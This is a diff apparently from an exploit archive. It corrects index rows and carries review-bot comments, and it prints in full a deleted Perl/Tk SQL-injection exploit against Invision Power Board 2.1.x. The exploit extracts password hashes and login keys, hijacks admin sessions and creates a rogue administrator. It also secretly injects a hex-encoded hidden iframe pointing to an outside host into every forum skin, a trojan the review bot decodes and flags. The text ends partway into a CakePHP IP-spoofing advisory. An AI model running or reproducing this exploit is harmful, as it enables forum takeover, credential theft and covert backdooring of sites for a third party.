@ -28214,7 +28211,7 @@ id,file,description,date,author,platform,type,port
31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure/HTML Injection/Cross-Site Scripting",2008-03-03,"Digital Security Research Group",php,webapps,0
31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0
31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
31329,platforms/multiple/webapps/31329..txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0
31329,platforms/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0
31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0
31338,platforms/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos,0
31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0
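Review bot: correcting the path from 31329..txt to 31329.txt only helps if the file on disk is renamed in the same commit; the CSV path is what the archive's search tooling resolves, so a mismatch either way yields a dead link. Worth confirming the rename is among the 18 changed files. Separately, this record (dated 2014-02-01) sits between 2008 entries, which is pre-existing but makes the id look misassigned.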
@ -32189,7 +32186,7 @@ id,file,description,date,author,platform,type,port
35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion/SQL Injection/XSS",2015-01-09,Technidev,php,webapps,80
35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0
@ -35346,7 +35343,7 @@ id,file,description,date,author,platform,type,port
39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0
39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0
39102,platforms/windows/local/39102.py,"EasyCafe Server <= 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0
39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0
39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0
39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0
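Review bot: entry 39102 is retitled "EasyCafe Server <= 2.2.14 - Remote File Read" but remains filed under platforms/windows/local with type "local". A remote file read by name is a remote-type entry; either the type and directory should move to windows/remote alongside the path fix this hunk makes, or the title should not say "Remote".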
@ -35394,8 +35391,8 @@ id,file,description,date,author,platform,type,port
39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
39149,platforms/lin_x86-64/shellcode/39149.c,"x64 Linux Bind TCP Port Shellcode",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39151,platforms/lin_x86-64/shellcode/39151.c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152.c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
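Review bot: the path fixes for 39151 and 39152 are correct, but the description for 39151, "x86_64 Linux bind TCP port shellcode", is left in lowercase while the adjacent 39149 by the same author, Scorpion_, reads "x64 Linux Bind TCP Port Shellcode". Given that this commit normalizes capitalization elsewhere (webdav to WebDAV, iis to IIS), 39151 should get the same treatment, and the two near-identical titles from one author a day apart deserve a distinguishing detail so they are not mistaken for a duplicate.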
@ -35999,7 +35996,14 @@ id,file,description,date,author,platform,type,port
39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809..cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80
39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0
39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC",2016-05-16,HauntIT,windows,dos,0
39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
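Review bot: id 39809 appears twice here, once with the malformed path `39809..cs` and once corrected to `39809.cs`; the header counts (`-35999,7 +35996,14`, i.e. fifteen rows shown for six context lines, one removal and eight additions) are consistent with a single-line replacement, so this is a rendering of removed-plus-added rather than a real duplicate, but it is worth a quick `cut -d, -f1 files.csv | sort | uniq -d` before merging. Two smaller points: ids 39806, 39807, 39815 and 39818 are absent between 39805 and 39821 (fine if they were withdrawn, but there should be no matching files in the tree without a CSV row), and the port column is 0 everywhere except 39808 (37848) and 39813 (80); if that column is meant to be the target service port, 39817 also targets a plain HTTP POST (the exploit in this same commit hard-codes `$port=80;`) and should arguably carry 80 as well.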


@ -1,390 +0,0 @@
source: http://www.securityfocus.com/bid/18984/info
Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
#!/usr/bin/perl
## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;
$mw = new MainWindow(title => "r57ipb216gui" );
$mw->geometry ( '420x550' ) ;
$mw->resizable(0,0);
$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '')->pack();
$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = 'http://server/forum/index.php';
$user_id = '1';
$prefix = 'ibf_';
$table = 'members';
$column = 'member_login_key';
$new_admin_name = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email = 'billy@microsoft.com';
$report = '';
$group = 4;
$curr_user = 0;
$rand_session = &session();
$use_custom_fields = 0;
$custom_fields = 'name1=value1,name2=value2';
$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$b2 = $fright->BrowseEntry( -command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8');
$b2->insert("end", "members");
$b2->insert("end", "members_converge");
$b2->pack( -side => "top" , -anchor => 'w');
$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$b = $fright->BrowseEntry( -relief => "groove", -variable => \$column, -font => '{Verdana} 8');
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
$b->pack( -side => "top" , -anchor => 'w' );
$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label ( -text => ' ')->pack();
$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => \$curr_user)->pack(-side => "top" , -anchor => 'w');
$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => ' ')->pack();
$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top" , -anchor => 'w');
$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fright->Button(-text => 'Test forum vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&test_vuln
)->pack();
$fright->Button(-text => 'Get database tables prefix',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_prefix
)->pack();
$fright->Button(-text => 'Get data from database',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_data
)->pack();
$fright->Button(-text => 'Get admin session',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_admin
)->pack();
$fright->Button(-text => 'Create new admin',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&create_admin
)->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();
MainLoop();
sub update_columns()
{
$b->delete(0,"end");
if($table eq 'members'){
$column = "member_login_key";
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
} elsif($table eq 'members_converge'){
$column = "converge_pass_hash";
$b->insert("end", "converge_pass_hash");
$b->insert("end", "converge_pass_salt");
$b->insert("end", "converge_email");
}
}
sub get_admin()
{
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]);
if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; }
else { $sql = ''; }
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");
$error = 0;
$rep = '';
if($res->is_success)
{
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; }
else { $error = 1; }
if(!$error)
{
$rep = '';
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; }
else { $error = 1; }
if(!$error){
if($curr_user != 1)
{
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; }
}
else
{
$session_user_id = $user_id;
}
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; }
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; }
}
$InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack;
$InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
if($error)
{
$InfoWindow->add('Label', -text => 'Can\'t get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
}
sub get_data()
{
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]);
if($table eq 'members') { $id_text = 'id'; }
if($table eq 'members_converge') { $id_text = 'converge_id'; }
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $report = $3; }
else
{
$InfoWindow->add('Label', -text => 'Can\'t get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
}
sub create_admin()
{
$InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]);
if($session_id eq '' || $session_ip_address eq '')
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;
}
elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;
}
else
{
$xpl = LWP::UserAgent->new( ) or die;
($url2 = $url) =~ s/index.php/admin.php/;
$cf = '';
%fields = (
'code' => 'doadd',
'act' => 'mem',
'section' => 'content',
'name' => $new_admin_name,
'password' => $new_admin_password,
'email' => $new_admin_email,
'mgroup' => $group,
);
if($use_custom_fields)
{
@cf = split(',',$custom_fields);
foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}
}
$res = $xpl->post($url2."?adsess=$session_id",
[
%fields,
],
'USER_AGENT'=>'',
'CLIENT_IP'=>"$session_ip_address",
'X_FORWARDED_FOR'=>"$session_ip_address");
$if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';
$query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")";
$res = $xpl->post($url2."?adsess=$session_id",
[
'code' => 'runsql',
'act' => 'sql',
'section' => 'admin',
'query' => $query,
],
'USER_AGENT'=>'',
'CLIENT_IP'=>"$session_ip_address",
'X_FORWARDED_FOR'=>"$session_ip_address");
$InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;
$InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;
}
$InfoWindow->Show();
$InfoWindow->destroy;
}
sub test_vuln()
{
$InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; }
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
}
$InfoWindow->Show();
$InfoWindow->destroy;
}
sub get_prefix()
{
$InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /FROM (.*)sessions/)
{
$prefix = $1;
$InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;
}
else
{
$InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
}
$InfoWindow->Show();
$InfoWindow->destroy;
}
sub session()
{
return 'r57ipb216_for_IDS';
}
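Review bot: this deletion is justified on grounds beyond housekeeping, and the commit should say so: the script is trojanized. After `create_admin` adds the new administrator through admin.php, it issues a second `runsql` POST whose `$query` is `UPDATE <prefix>skin_sets SET set_wrapper = CONCAT(set_wrapper, $if), set_cache_wrapper = CONCAT(set_cache_wrapper, $if)` with no WHERE clause, and the hex literal in `$if` decodes to `<div style="VISIBILITY: hidden"><iframe src="http://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe></div>`. In other words, every skin on the compromised forum gets a hidden 1x1 iframe to a third-party host, which nothing in the header comments discloses; anyone who runs the "exploit" backdoors the target for whoever controls that domain. Recording that in the deletion note keeps the file from being restored from history, and the fixed `s=r57ipb216_for_IDS` session marker plus the `CLIENT_IP` header carrying a raw `' UNION SELECT ...` string are convenient web-log signatures for defenders who inherit an old IPB 2.1.x install.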

platforms/php/webapps/39813.txt Executable file

@ -0,0 +1,284 @@
=============================================
- Release date: 12.05.2016
- Discovered by: Dawid Golunski
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
CakePHP Framework <= 3.2.4 IP Spoofing Vulnerability
3.1.11
2.8.1
2.7.10
2.6.12
II. BACKGROUND
-------------------------
- CakePHP Framework
http://cakephp.org/
"CakePHP makes building web applications simpler, faster and require less code.
CakePHP is a modern PHP 5.4+ framework with a flexible Database access layer
and a powerful scaffolding system that makes building both small and complex
systems a breeze. "
III. INTRODUCTION
-------------------------
CakePHP Framework contains a vulnerability that allows to spoof the source IP
address. This can allow to bypass access control lists, or injection of
malicious data which, if treated as sanitized by an unaware CakePHP-based
application, can lead to other vulnerabilities such as SQL injection, XSS,
command injection etc.
IV. DESCRIPTION
-------------------------
Both branches of CakePHP Framework (2.x, 3.x) contain a clientIp() method that
allows to obtain the IP address of a client accessing a CakePHP-based
application. The is slightly different in each branch:
CakePHP 2.x:
------[ Cake/Network/CakeRequest.php ]------
public function clientIp($safe = true) {
if (!$safe && env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '', env('HTTP_X_FORWARDED_FOR'));
} else {
if (env('HTTP_CLIENT_IP')) {
$ipaddr = env('HTTP_CLIENT_IP');
} else {
$ipaddr = env('REMOTE_ADDR');
}
}
if (env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = env('HTTP_CLIENTADDRESS');
if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
}
}
return trim($ipaddr);
}
--------------------------------------------
CakePHP 3.x:
------[ cakephp/src/Network/Request.php ]------
/**
* Get the IP the client is using, or says they are using.
*
* @return string The client IP.
*/
public function clientIp()
{
if ($this->trustProxy && $this->env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '', $this->env('HTTP_X_FORWARDED_FOR'));
} else {
if ($this->env('HTTP_CLIENT_IP')) {
$ipaddr = $this->env('HTTP_CLIENT_IP');
} else {
$ipaddr = $this->env('REMOTE_ADDR');
}
}
if ($this->env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = $this->env('HTTP_CLIENTADDRESS');
if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
}
}
return trim($ipaddr);
}
--------------------------------------------
Both of the methods contain the same vulnerability. Despite the safe flag
(CakePHP 2.x), and trustyProxy flag (CakePHP 3.x) set to off by default, they
both use HTTP_CLIENT_IP request header (if it exists) instead of the
REMOTE_ADDR variable set by the web server.
The HTTP_CLIENT_IP header can easily be spoofed by sending CLIENT-IP header
in a HTTP request.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
A) Simple PoC
Download a vulnerable version of CakePHP framework and edit
src/Template/Pages/home.ctp to include the PoC code below
which echoes the visitor's IP using the clientIp() method:
-------[ src/Template/Pages/home.ctp ]--------
<?php
[...]
use Cake\Cache\Cache;
use Cake\Core\Configure;
use Cake\Datasource\ConnectionManager;
